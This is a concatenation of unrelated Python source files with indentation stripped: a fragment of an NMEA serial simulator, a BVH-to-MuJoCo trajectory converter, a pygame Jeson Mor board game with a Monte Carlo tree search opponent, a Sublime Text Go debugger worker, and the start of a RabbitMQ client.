self.api.setStatus("STARTED", "trying to connect to %s at 4800" % (self.device))
lastDevice=self.device
#on windows we would need an integer as device...
try:
pnum = int(self.device)
except:
pnum = self.device
self.isConnected=False
self.isBusy=False
try:
self.connection = serial.Serial(port=pnum, baudrate=4800, bytesize=serial.EIGHTBITS, parity=serial.PARITY_MARK, stopbits=serial.STOPBITS_ONE, timeout=None, xonxoff=False, rtscts=False, dsrdtr=False)
self.api.setStatus("NMEA","connected to %s at 4800"%(self.device))
self.api.log("connected to %s at 4800" % (self.device))
self.isConnected=True
errorReported=False
#continously read data to get an exception if disconnected
while True:
#self.connection.readline(10)
if(int(self.dynamic) > 0):
self.DBT += self.DBT_step
if(self.DBT > 20.0):
self.DBT = 20.0
self.DBT_step = -0.5
if(self.DBT < 0.5):
self.DBT = 0.5
self.DBT_step = +0.5
self.STW += self.STW_step
if(self.STW > 13.0):
self.STW = 13.0
self.STW_step = -0.2
if(self.STW < 1.0):
self.STW = 1.0
self.STW_step = +0.2
else:
self.DBT = 6.7
self.DBT_step = 0.1
self.STW = 10.9
self.STW_step = 0.5
time.sleep(2)
except Exception as e:
if not errorReported:
self.api.setStatus("ERROR","unable to connect/connection lost to %s: %s"%(self.device, str(e)))
self.api.error("unable to connect/connection lost to %s: %s" % (self.device, str(e)))
errorReported=True
self.isConnected=False
time.sleep(1)
time.sleep(1)
|
convert_clip_multiprocess.py
|
import os
import sys
sys.path.append(os.getcwd())
from utils import *
from utils.transformation import quaternion_from_euler
from mujoco_py import load_model_from_path
from mocap.skeleton import Skeleton
from mocap.pose import load_bvh_file, interpolated_traj
import pickle
import glob
import argparse
import time
import multiprocessing
from scipy.ndimage.filters import median_filter
def get_qpos(pose, bone_addr):
"""
    :param pose: flattened BVH pose vector for a single frame
    :param bone_addr: dict mapping bone name -> (start, end) index range into `pose`
    :return: qpos vector laid out for the loaded MuJoCo model
"""
qpos = np.zeros(model.nq)
for bone_name, ind2 in body_qposaddr.items():
ind1 = bone_addr[bone_name]
if ind1[0] == 0:
trans = pose[ind1[0]:ind1[0] + 3].copy()
angles = pose[ind1[0] + 3:ind1[1]].copy()
quat = quaternion_from_euler(angles[0], angles[1], angles[2], 'rxyz')
qpos[ind2[0]:ind2[0] + 3] = trans
qpos[ind2[0] + 3:ind2[1]] = quat
else:
qpos[ind2[0]:ind2[1]] = pose[ind1[0]:ind1[1]]
return qpos
def get_poses(bvh_file):
time0_get_poses = time.time() # time start load.
poses, bone_addr = load_bvh_file(bvh_file, skeleton)
poses_samp = interpolated_traj(poses, args.dt, mocap_fr=args.mocap_fr)
qpos_traj = []
for i in range(poses_samp.shape[0]):
cur_pose = poses_samp[i, :]
cur_qpos = get_qpos(cur_pose, bone_addr)
qpos_traj.append(cur_qpos)
qpos_traj = np.vstack(qpos_traj)
# post-process qpos
# set the feet on ground plane
qpos_traj[:, 2] += args.offset_z
time_cost_get_poses = time.time() - time0_get_poses # time spend.
print('-> get_poses spends {:.2f}s on {} with {:0>6d} frames'.format(time_cost_get_poses, bvh_file, poses.shape[0]))
return qpos_traj
def bvh2traj(file):
print('start extracting trajectory from %s' % file)
qpos_traj = get_poses(file)
name = os.path.splitext(os.path.basename(file))[0]
# bvh_dir = os.path.dirname(file)
# traj_p_folder = bvh_dir.replace('traj_bvh', 'traj_p')
traj_file = '%s/datasets/traj_p/%s_traj.p' % (args.mocap_folder, name)
pickle.dump(qpos_traj, open(traj_file, 'wb'))
print('save trajectory to %s' % traj_file)
if __name__=='__main__':
"""
bvh to traj.p to expert
python ./pose_imitation/data_process/convert_clip_multiprocess.py
"""
parser = argparse.ArgumentParser()
parser.add_argument('--render', action='store_true', default=True)
parser.add_argument('--model-id', type=str, default='humanoid_h36m_v4')
parser.add_argument('--mocap-folder', type=str, default='debug')
parser.add_argument('--mocap-fr', type=int, default=30)
parser.add_argument('--dt', type=float, default=1 / 30)
parser.add_argument('--offset-z', type=float, default=0.06)
parser.add_argument('--num-threads', type=int, default=32)
args = parser.parse_args()
timer = Timer()
traj_p_folder = '%s/datasets/traj_p' % args.mocap_folder
recreate_dirs(traj_p_folder)
model_file = 'assets/mujoco_models/%s.xml' % args.model_id
model = load_model_from_path(model_file)
body_qposaddr = get_body_qposaddr(model)
timer.update_time('complete load XML')
bvh_files = glob.glob(os.path.expanduser('%s/datasets/traj_bvh/*.bvh' % args.mocap_folder))
bvh_files.sort()
# if args.range is not None:
# bvh_files = bvh_files[args.range[0]: args.range[1]]
print('bvh_files:', bvh_files)
# init skeleton class.
skt_bvh = bvh_files[0]
exclude_bones = {'Thumb', 'Index', 'Middle', 'Ring', 'Pinky', 'End', 'Toe'}
spec_channels = {'LeftForeArm': ['Zrotation'], 'RightForeArm': ['Zrotation'],
'LeftLeg': ['Xrotation'], 'RightLeg': ['Xrotation']}
skeleton = Skeleton()
skeleton.load_from_bvh(skt_bvh, exclude_bones, spec_channels)
# skeleton.write_xml('assets/mujoco_models/test.xml', 'assets/mujoco_models/template/humanoid_template.xml')
# start
task_lst = bvh_files
num_threads = args.num_threads
for ep in range(math.ceil(len(task_lst) / num_threads)):
p_lst = []
for i in range(num_threads):
idx = ep * num_threads + i
if idx >= len(task_lst):
break
p = multiprocessing.Process(target=bvh2traj, args=(task_lst[idx],))
p_lst.append(p)
for p in p_lst:
p.start()
for p in p_lst:
p.join()
print('complete ep:', ep)
# end.
timer.update_time('complete multiprocessing')
# # save a traj_dict file,
traj_dict_folder = '%s/datasets/traj_dict' % args.mocap_folder
traj_dict_path = '{}/traj_dict.pkl'.format(traj_dict_folder)
if os.path.exists(traj_dict_path):
traj_dict = np.load(traj_dict_path, allow_pickle=True)
else:
recreate_dirs(traj_dict_folder)
traj_dict = {}
take_list = glob.glob('{}/*traj.p'.format(traj_p_folder))
for take in take_list:
take_name = take.split('/')[-1].split('_traj.')[0]
orig_traj = np.load(take, allow_pickle=True)
if not take_name in traj_dict:
traj_dict[take_name] = {}
traj_dict[take_name]['predicted_3d_qpos'] = orig_traj
with open(traj_dict_path, 'wb') as f:
pickle.dump(traj_dict, f, pickle.HIGHEST_PROTOCOL)
|
main.py
|
import queue
import threading
import os
import pygame
import sys
from GUI.board_gui import *
from mcts.nodes import *
from mcts.search import MonteCarloTreeSearch
from state import GameState
from state import GameMove
from position import Position
from board import *
import pygame_textinput
import re
import time
def resource_path(relative_path):
default = "assets/"
relative_path = default + relative_path
try:
base_path = sys._MEIPASS
except Exception:
base_path = os.path.abspath(".")
return os.path.join(base_path, relative_path)
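# For example, resource_path("gui/button.png") resolves to "<base>/assets/gui/button.png",
# where <base> is the PyInstaller bundle dir (sys._MEIPASS) when frozen, or the current
# working directory otherwise.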
pygame.init()
pygame.font.init()
# Game window settings
screen = pygame.display.set_mode((60*9, 60 * 9))
pygame.display.set_caption('Python Jeson Mor Game')
clock = pygame.time.Clock()  # window refresh clock
#MENU
menu_image = pygame.image.load(resource_path("gui/home-screen.png"))
button_image = pygame.image.load(resource_path("gui/button.png"))
button_image_small = pygame.image.load(resource_path("gui/small-button.png"))
settings_image = pygame.image.load(resource_path("gui/settings.png"))
mode_image = pygame.image.load(resource_path("gui/mode.png"))
winner_white = pygame.image.load(resource_path("gui/white_winner.png"))
winner_black = pygame.image.load(resource_path("gui/black_winner.png"))
#MENU TEXT
text_color = (124, 73, 0)
highlight_color = (140, 97, 72)
menu_font = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 20)
menu_font_small = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 15)
start_game_text = menu_font.render("Start game", True, text_color)
settings_text = menu_font.render("Settings", True, text_color)
quit_text = menu_font.render("Quit", True, text_color)
accept_text = menu_font.render("Accept", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
player_vs_player_text = menu_font.render("Player vs Player", True, text_color)
player_vs_ai_text = menu_font.render("Player vs AI", True, text_color)
ai_vs_ai_text = menu_font.render("AI vs AI", True, text_color)
textinput_font = pygame.font.Font(resource_path("gui/GROBOLD.ttf"), 22)
# Load the generated board image
bg = pygame.image.load(resource_path("board.png")).convert()
player = 1
board = BoardGUI()
global all_sprites_list, sprites
all_sprites_list = pygame.sprite.Group()
sprites = [piece for row in board.array for piece in row if piece]
all_sprites_list.add(sprites)
def reload_sprites():
return [piece for row in board.array for piece in row if piece]
def select_piece_xy(color, x, y):
    # get a list of all sprites that are under the mouse cursor
clicked_sprites = [s for s in sprites if s.x == x and s.y == y]
    # highlight and return the piece if it belongs to the player
if len(clicked_sprites) == 1 and clicked_sprites[0].color == color:
clicked_sprites[0].highlight()
return clicked_sprites[0]
elif len(clicked_sprites) == 1:
return clicked_sprites[0]
def select_piece(color):
pos = pygame.mouse.get_pos()
    # get a list of all sprites that are under the mouse cursor
clicked_sprites = [s for s in sprites if s.rect.collidepoint(pos)]
    # highlight and return the piece if it belongs to the player
if len(clicked_sprites) == 1 and clicked_sprites[0].color == color:
clicked_sprites[0].highlight()
return clicked_sprites[0]
elif len(clicked_sprites) == 1:
return clicked_sprites[0]
def select_square():
x, y = pygame.mouse.get_pos()
x = x // 60
y = y // 60
return y, x
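# Example: with 60 px tiles, a click at pixel (x=130, y=250) maps to board square (row 4, column 2),
# since select_square returns (y // 60, x // 60).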
# mode:
# 0 - player vs player
# 1 - player vs computer
# 2 - computer vs computer
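# e.g. run_game(1, 500) would start a Player-vs-AI game with 500 MCTS simulations per move
# (500 is an illustrative value; the menu below defaults to 1000)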
def run_game(mode, number_of_simulations):
global all_sprites_list, sprites
global board
board = BoardGUI()
all_sprites_list = pygame.sprite.Group()
sprites = [piece for row in board.array for piece in row if piece]
all_sprites_list.add(sprites)
    gameover = False  # end-of-game flag
    winner = ""  # winner identifier
selected = False
trans_table = dict()
checkWhite = False
player = 1
previous_move = ''
current_move = ''
run_flag = 0
#=====================================
# Threading things
is_simulation_running = False
t1, t2 = None, None
q1, q2 = queue.Queue(), queue.Queue()
# =====================================
screen.blit(bg, (0, 0))
all_sprites_list.draw(screen)
pygame.display.update()
clock.tick(60)
while not gameover:
previous_move = current_move
if player == 1:
if mode == 0 or mode == 1:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
                    # select a piece to move
elif event.type == pygame.MOUSEBUTTONDOWN and not selected:
board.unhighlight_optional_moves()
piece = select_piece("w")
# generuje "legalne" ruchy pionka
if piece != Empty and piece.color == "w":
                            # check the available moves
player_moves = piece.gen_legal_moves(board)
# all_player_moves = board.get_all_legal_moves("w")
                            # highlight the available moves
board.highlight_optional_moves(player_moves)
selected = True
                    # piece selected -> choose a move
elif event.type == pygame.MOUSEBUTTONDOWN and selected:
board.unhighlight_optional_moves()
square = select_square()
                        # check whether the chosen square is among the allowed moves
if square in player_moves:
oldx = piece.x
oldy = piece.y
dest = board.array[square[0]][square[1]]
                            # make the move
board.move_piece(piece, square[0], square[1])
                            if dest:  # update the sprites to match the board state
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(sprites)
selected = False
player = 2
                        # cancel the move if the same square was selected again
elif (piece.y, piece.x) == square:
piece.unhighlight()
selected = False
                        # the move is invalid
else:
pygame.display.update()
# board.highlight_optional_moves(player_moves)
pygame.time.wait(1000)
elif mode == 2:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
board_mcts = Board(board=simplify_board(board.array))
board_state = GameState(state=board_mcts, next_to_move=1)
root = MonteCarloTreeSearchNode(state=board_state, parent=None)
mcts = MonteCarloTreeSearch(root)
if not is_simulation_running:
t1 = threading.Thread(target=mcts.best_action, args=(number_of_simulations, q1))
t1.daemon = True
t1.start()
is_simulation_running = True
# best_node = mcts.best_action(number_of_simulations)
else:
if not q1.empty():
best_node = q1.get()
# t1.join()
q1.queue.clear()
is_simulation_running = False
c_state = best_node.state
c_board = c_state.board
x_from = c_state.current_move.pos_from.getX()
y_from = c_state.current_move.pos_from.getY()
# print("x_from", x_from)
# print("y_from", y_from)
x_to = c_state.current_move.pos_to.getX()
y_to = c_state.current_move.pos_to.getY()
# print("x_to", x_to)
# print("y_to", y_to)
piece = select_piece_xy("w", x_from, y_from)
square = (x_to, y_to)
dest = board.array[y_to][x_to]
                        board.move_piece(piece, y_to, x_to)  # make the move
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
player = 2
        # second player
elif player == 2:
if mode == 0:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
elif event.type == pygame.MOUSEBUTTONDOWN and not selected:
board.unhighlight_optional_moves()
piece = select_piece("b")
if piece != Empty and piece.color == "b":
                            # check the available moves
player_moves = piece.gen_legal_moves(board)
# print(player_moves)
                            # highlight the available moves
board.highlight_optional_moves(player_moves)
selected = True
elif event.type == pygame.MOUSEBUTTONDOWN and selected:
board.unhighlight_optional_moves()
square = select_square()
if square in player_moves:
oldx = piece.x
oldy = piece.y
dest = board.array[square[0]][square[1]]
                            # make the move
board.move_piece(piece, square[0], square[1])
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
selected = False
player = 1
elif (piece.y, piece.x) == square:
piece.unhighlight()
selected = False
else:
pygame.display.update()
board.highlight_optional_moves(player_moves)
pygame.time.wait(1000)
elif mode == 1 or mode == 2:
for event in pygame.event.get():
if event.type == pygame.QUIT:
sys.exit()
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
gameover = True
board_mcts = Board(board=simplify_board(board.array))
# print(board_mcts.boardValues)
board_state = GameState(state=board_mcts, next_to_move=-1)
root = MonteCarloTreeSearchNode(state=board_state, parent=None)
mcts = MonteCarloTreeSearch(root)
if not is_simulation_running:
t2 = threading.Thread(target=mcts.best_action, args=(number_of_simulations, q2))
t2.daemon = True
t2.start()
is_simulation_running = True
# best_node = mcts.best_action(number_of_simulations)
else:
if not q2.empty():
best_node = q2.get()
# t2.join()
q2.queue.clear()
is_simulation_running = False
c_state = best_node.state
c_board = c_state.board
x_from = c_state.current_move.pos_from.getX()
y_from = c_state.current_move.pos_from.getY()
# print("x_from", x_from)
# print("y_from", y_from)
x_to = c_state.current_move.pos_to.getX()
y_to = c_state.current_move.pos_to.getY()
# print("x_to", x_to)
# print("y_to", y_to)
piece = select_piece_xy("b", x_from, y_from)
square = (x_to, y_to)
dest = board.array[y_to][x_to]
                        board.move_piece(piece, y_to, x_to)  # make the move
if dest:
sprites = reload_sprites()
all_sprites_list.empty()
all_sprites_list.add(reload_sprites())
player = 1
screen.blit(bg, (0, 0))
all_sprites_list.draw(screen)
pygame.display.update()
clock.tick(60)
arr = []
for j in range(9):
for piecee in board.array[j]:
arr.append(piecee.color + piecee.symbol)
# check end game
if 'wN' not in arr:
gameover = True
winner = "Black"
elif 'bN' not in arr:
gameover = True
winner = "White"
current_move = arr[40]
if previous_move == 'wN' and current_move == "_N":
gameover = True
winner = "White"
elif previous_move == 'bN' and current_move == "_N":
gameover = True
winner = "Black"
output_board = simplify_board(board.array)
print("Wygrał: ", winner)
if winner == "White":
screen.blit(winner_white, (0, 0))
pygame.display.update()
time.sleep(5)
elif winner == "Black":
screen.blit(winner_black, (0, 0))
pygame.display.update()
time.sleep(5)
def printBoard(boardValues):
for j in range(9):
arr = []
for i in range(9):
x = boardValues[j][i]
if x is not None:
arr.append(x)
else:
arr.append("_")
print(arr)
if __name__ == "__main__":
number_of_simulations = 1000
menu = True
try:
while True:
while menu:
for event in pygame.event.get():
if event.type == pygame.QUIT:
pygame.quit()
quit()
elif event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
print(x, y)
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
print("start game")
mode = True
while mode:
events = pygame.event.get()
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
mode = False
run_game(0, number_of_simulations)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
mode = False
run_game(1, number_of_simulations)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
mode = False
run_game(2, number_of_simulations)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
mode = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
mode = False
elif event.type == pygame.QUIT:
pygame.quit()
quit()
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
player_vs_player_text = menu_font.render("Player vs Player", True, highlight_color)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
player_vs_ai_text = menu_font.render("Player vs AI", True, highlight_color)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
ai_vs_ai_text = menu_font.render("AI vs AI", True, highlight_color)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
back_text = menu_font_small.render("Back", True, highlight_color)
else:
player_vs_player_text = menu_font.render("Player vs Player", True, text_color)
player_vs_ai_text = menu_font.render("Player vs AI", True, text_color)
ai_vs_ai_text = menu_font.render("AI vs AI", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
screen.blit(mode_image, (0, 0))
screen.blit(button_image, (164, 140))
screen.blit(player_vs_player_text, (195, 150))
screen.blit(button_image, (164, 210))
screen.blit(player_vs_ai_text, (210, 220))
screen.blit(button_image, (164, 280))
screen.blit(ai_vs_ai_text, (230, 290))
screen.blit(button_image_small, (450, 500))
screen.blit(back_text, (470, 505))
pygame.display.flip()
pygame.display.update()
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
print("settings")
settings = True
textinput = pygame_textinput.TextInput(initial_string=str(number_of_simulations),
font_family=resource_path("gui/GROBOLD.ttf"), font_size=22,
text_color=(124, 73, 0), max_string_length=10)
while settings:
events = pygame.event.get()
textinput.update(events)
for event in events:
if event.type == pygame.MOUSEBUTTONDOWN:
x, y = event.pos
if button_image.get_rect(topleft=(164, 250)).collidepoint(x, y):
pattern = re.compile("\d{1,10}$")
if pattern.match(textinput.get_text()):
textinput.set_text_color((0, 255, 0))
number_of_simulations = int(textinput.get_text())
else:
textinput.set_text_color((255, 0, 0))
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
settings = False
elif event.type == pygame.KEYDOWN:
if event.key == pygame.K_ESCAPE:
settings = False
elif event.type == pygame.QUIT:
pygame.quit()
quit()
try:
if number_of_simulations != int(textinput.get_text()):
textinput.set_text_color((124, 73, 0))
except:
pass
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 250)).collidepoint(x, y):
accept_text = menu_font.render("Accept", True, highlight_color)
elif button_image_small.get_rect(topleft=(450, 500)).collidepoint(x, y):
back_text = menu_font_small.render("Back", True, highlight_color)
else:
accept_text = menu_font.render("Accept", True, text_color)
back_text = menu_font_small.render("Back", True, text_color)
input_text_size = textinput_font.size(textinput.get_text())
screen.blit(settings_image, (0, 0))
screen.blit(button_image, (164, 250))
screen.blit(accept_text, (230, 260))
screen.blit(button_image_small, (450, 500))
screen.blit(back_text, (470, 505))
screen.blit(textinput.get_surface(), (270 - int(input_text_size[0]/2), 167))
pygame.display.flip()
pygame.display.update()
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
print("exit")
raise Exception
#Highlight menu text
x, y = pygame.mouse.get_pos()
if button_image.get_rect(topleft=(164, 140)).collidepoint(x, y):
start_game_text = menu_font.render("Start game", True, highlight_color)
elif button_image.get_rect(topleft=(164, 210)).collidepoint(x, y):
settings_text = menu_font.render("Settings", True, highlight_color)
elif button_image.get_rect(topleft=(164, 280)).collidepoint(x, y):
quit_text = menu_font.render("Quit", True, highlight_color)
else:
start_game_text = menu_font.render("Start game", True, text_color)
settings_text = menu_font.render("Settings", True, text_color)
quit_text = menu_font.render("Quit", True, text_color)
#Display menu
screen.blit(menu_image, (0, 0))
screen.blit(button_image, (164, 140))
screen.blit(start_game_text, (215, 150))
screen.blit(button_image, (164, 210))
screen.blit(settings_text, (230, 220))
screen.blit(button_image, (164, 280))
screen.blit(quit_text, (245, 290))
pygame.display.flip()
clock.tick(60)
pygame.display.update()
except Exception:
pygame.quit()
sys.exit()
|
sdworker.py
|
import sublime
import threading
import traceback
import sys
import queue
from GoDebug.jsonrpctcp_client import JsonRpcTcpClient
from GoDebug.jsonrpctcp_client import JsonRpcTcpProtocolError
def __start(connect, const, logger):
logger.debug("Start worker")
try:
connect._open(const.HOST, const.PORT)
return True
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
return False
def __stop(connect, const, logger):
try:
if connect._is_open():
connect._close()
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
logger.debug("Stop worker")
def __default_cfg():
return {
'followPointers': True,
'maxVariableRecurse': 5,
'maxStringLen': 128,
'maxArrayValues': 64,
'maxStructFields': -1
}
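# These fields appear to mirror Delve's variable LoadConfig limits: whether to follow pointers,
# how deep to recurse into nested values, and truncation limits for strings/arrays/structs
# (-1 meaning "load all struct fields"); the exact semantics are defined by Delve, not by this plugin.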
def __get_eval_parms(goroutine_id, frame, expr):
return {"Scope": {"GoroutineID": goroutine_id, "Frame": frame}, "Expr": expr, "Cfg": __default_cfg()}
def __get_variable_parms(goroutine_id, frame):
return {"Scope": {"GoroutineID": goroutine_id, "Frame": frame}, "Cfg": __default_cfg()}
def __get_stacktrace_parms(goroutine_id):
# return {"Id": goroutine_id, "Depth": 20, "Full": False, "Cfg": __default_cfg()}
return {"Id": goroutine_id, "Depth": 20}
def __get_current_goroutine(response):
if type(response) is dict:
if 'State' in response:
if not response['State']['exited'] and 'currentThread' in response['State']:
return response['State']['currentThread']['goroutineID']
return None
def __get_error_response(cmd, parms):
return {"cmd": cmd, "parms": parms, "result": False}
def __get_error_response_ex(cmd, parms, e):
return {"cmd": cmd, "parms": parms, "result": False, "error_code": e.code, "error_message": e.message}
def _do_method(alive, queue, prj, worker_callback=None):
const = prj.const
logger = prj.logger
connect = JsonRpcTcpClient(const, logger)
if __start(connect, const, logger):
alive.set()
while alive.isSet():
requests = queue.get()
if requests is None:
alive.clear()
continue
responses = []
errors = False
goroutine_id = None
goroutines = False
frame = 0
watches = None
for request in requests:
cmd = request["cmd"]
parms = request["parms"]
if parms is None:
parms = {}
try:
if cmd in const.RUNTIME_COMMANDS:
parms['name'] = cmd
response = connect.RPCServer.Command(parms)
goroutine_id = __get_current_goroutine(response)
elif cmd == const.STATE_COMMAND:
if errors:
errors = False
response = connect.RPCServer.State(parms)
goroutine_id = __get_current_goroutine(response)
elif cmd == const.CREATE_BREAKPOINT_COMMAND:
response = connect.RPCServer.CreateBreakpoint(parms)
elif cmd == const.CLEAR_BREAKPOINT_COMMAND:
response = connect.RPCServer.ClearBreakpoint({"Id": parms['bkpt_id'], "Name": parms['bkpt_name']})
elif cmd == const.RESTART_COMMAND:
response = connect.RPCServer.Restart(parms)
elif cmd == const.CANCEL_NEXT_COMMAND:
response = connect.RPCServer.CancelNext(parms)
elif cmd == const.STACKTRACE_COMMAND:
response = connect.RPCServer.Stacktrace(__get_stacktrace_parms(parms['goroutine_id']))
elif cmd == const.BREAKPOINT_COMMAND:
response = connect.RPCServer.ListBreakpoints(parms)
elif cmd == const.VARIABLE_COMMAND:
call_parms = __get_variable_parms(parms['goroutine_id'], parms['frame'])
response_locals = connect.RPCServer.ListLocalVars(call_parms)
response_args = connect.RPCServer.ListFunctionArgs(call_parms)
response = {"Locals": response_locals['Variables'], "Arguments": response_args['Args']}
elif cmd == const.WATCH_COMMAND:
if 'goroutine_id' in parms:
goroutine_id = parms['goroutine_id']
frame = parms['frame']
watches = parms['watches']
continue
elif cmd == const.GOROUTINE_COMMAND:
if not goroutines:
goroutines = True
continue
else:
raise ValueError("Unknown worker command: %s" % cmd)
responses.append({"cmd": cmd, "result": True, "response": response})
except JsonRpcTcpProtocolError as e:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
responses.append(__get_error_response_ex(cmd, parms, e))
if cmd not in [const.STATE_COMMAND, const.CREATE_BREAKPOINT_COMMAND, const.CLEAR_BREAKPOINT_COMMAND]:
errors = True
except:
traceback.print_exc(file=(sys.stdout if logger.get_file() == const.STDOUT else open(logger.get_file(),"a")))
logger.error("Exception thrown, details in file: %s" % logger.get_file())
responses.append(__get_error_response(cmd, parms))
if cmd not in [const.STATE_COMMAND, const.CREATE_BREAKPOINT_COMMAND, const.CLEAR_BREAKPOINT_COMMAND]:
errors = True
parms = {}
if errors:
errors = False
cmd = const.STATE_COMMAND
try:
response = connect.RPCServer.State(parms)
goroutine_id = __get_current_goroutine(response)
responses.append({"cmd": cmd, "result": True, "response": response})
except JsonRpcTcpProtocolError as e:
responses.append(__get_error_response_ex(cmd, parms, e))
errors = True
except:
responses.append(__get_error_response(cmd, parms))
errors = True
if not errors and goroutines:
cmd = const.GOROUTINE_COMMAND
try:
response = connect.RPCServer.ListGoroutines(parms)
found = False
for gr in response['Goroutines']:
if gr['id'] == goroutine_id:
found = True
break
if not found:
goroutine_id = 0
errors = True
responses.append({"cmd": const.GOROUTINE_COMMAND, "result": True, "response": response, "current_goroutine_id": goroutine_id})
except JsonRpcTcpProtocolError as e:
responses.append(__get_error_response_ex(cmd, parms, e))
errors = True
except:
responses.append(__get_error_response(cmd, parms))
errors = True
if not errors and watches is not None and goroutine_id > 0:
cmd = const.WATCH_COMMAND
response_watches = []
for element in watches:
try:
value = connect.RPCServer.Eval(__get_eval_parms(goroutine_id, frame, element['expr']))
response_watches.append({"watch_id": element['watch_id'], "result": True, "eval": value})
except JsonRpcTcpProtocolError as e:
response_watches.append(__get_error_response_ex(cmd, element, e))
except:
response_watches.append(__get_error_response(cmd, element))
responses.append({"cmd": const.WATCH_COMMAND, "result": True, "response": response_watches})
if worker_callback is not None:
                # schedule the callback on Sublime's main thread; the lambda (with default-arg
                # binding of the current values) defers the call instead of invoking it here
                sublime.set_timeout(lambda prj=prj, responses=responses: worker_callback(prj, responses), 0)
__stop(connect, const, logger)
class DlvWorker(object):
def __init__(self, prj, worker_callback = None):
self.__prj = prj
self.__worker_callback = worker_callback
self.__alive = threading.Event()
self.__queue = None
self.__stoped = True
def __start(self):
self.__stoped = False
self.__queue = queue.Queue()
t = threading.Thread(name='worker', target=_do_method, args=(self.__alive, self.__queue, self.__prj, self.__worker_callback))
t.start()
def stop(self):
if self.__queue is not None:
self.__queue.put(None)
self.__stoped = True
def do(self, cmd, parms=None):
self.do_batch([{"cmd": cmd, "parms": parms}])
def do_batch(self, requests):
logger = self.__prj.logger
if not self.__alive.isSet():
logger.warning("Worker not started, put requests to the queue")
if self.__stoped:
self.__start()
if type(requests) is not list:
logger.error("Wrong requests type %s on worker call, list expected" % type(requests))
return
elif len(requests) == 0:
logger.error("Call worker with empty request")
return
self.__queue.put(requests)
|
rabbit_mq_client.py
|
# Copyright 2016 deepsense.ai (CodiLime, Inc)
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import time
from threading import Thread
import pika
from pika.exceptions import ConnectionClosed
from utils import Logging
class RabbitMQClient(Logging):
_channel_impl = None
def __init__(self, address, credentials, exchange, exchange_type='topic'):
super(RabbitMQClient, self).__init__()
self._address = address
self._exchange = exchange
self._credentials = credentials
self._exchange_type = exchange_type
self._reset_consumer_thread(start=False)
self._declare_exchange()
def send(self, topic, message):
self._channel.basic_publish(exchange=self._exchange,
routing_key=topic,
body=message)
def subscribe(self, topic, handler):
queue_name = self._channel.queue_declare(exclusive=True).method.queue
self._channel.queue_bind(exchange=self._exchange,
queue=queue_name,
routing_key=topic)
self._channel.basic_consume(handler, queue=queue_name)
if not self._consumer_thread.is_alive():
self._reset_consumer_thread(start=True)
def consume(self, inactivity_timeout, handler, timeout_handler):
queue_name = self._channel.queue_declare(exclusive=True).method.queue
self._channel.queue_bind(exchange=self._exchange,
queue=queue_name)
for message in self._channel.consume(queue=queue_name,
inactivity_timeout=inactivity_timeout):
if message is not None:
handler(self._channel, message)
else:
timeout_handler()
def _declare_exchange(self):
self._channel.exchange_declare(exchange=self._exchange,
exchange_type=self._exchange_type)
def _reset_consumer_thread(self, start):
self._consumer_thread = Thread(target=self._channel.start_consuming)
self._consumer_thread.daemon = True
if start:
assert not self._consumer_thread.is_alive()
self._consumer_thread.start()
@property
def _channel(self):
if not self._channel_impl:
connection = self._establish_connection_to_mq(self._address, self._credentials)
self._channel_impl = connection.channel()
return self._channel_impl
@staticmethod
def _establish_connection_to_mq(address, credentials):
while True:
try:
return pika.BlockingConnection(
pika.ConnectionParameters(host=address[0], port=address[1],
credentials=pika.PlainCredentials(credentials[0], credentials[1])))
except ConnectionClosed:
time.sleep(1)
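# Hypothetical usage sketch (host, port, credentials and names below are illustrative only):
#   client = RabbitMQClient(address=('localhost', 5672),
#                           credentials=('guest', 'guest'),
#                           exchange='example_exchange')
#   RabbitMQJsonSender(client, topic='example.topic').send({'status': 'ok'})
#   RabbitMQJsonReceiver(client).subscribe('example.topic', handler=print)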
class RabbitMQJsonSender(Logging):
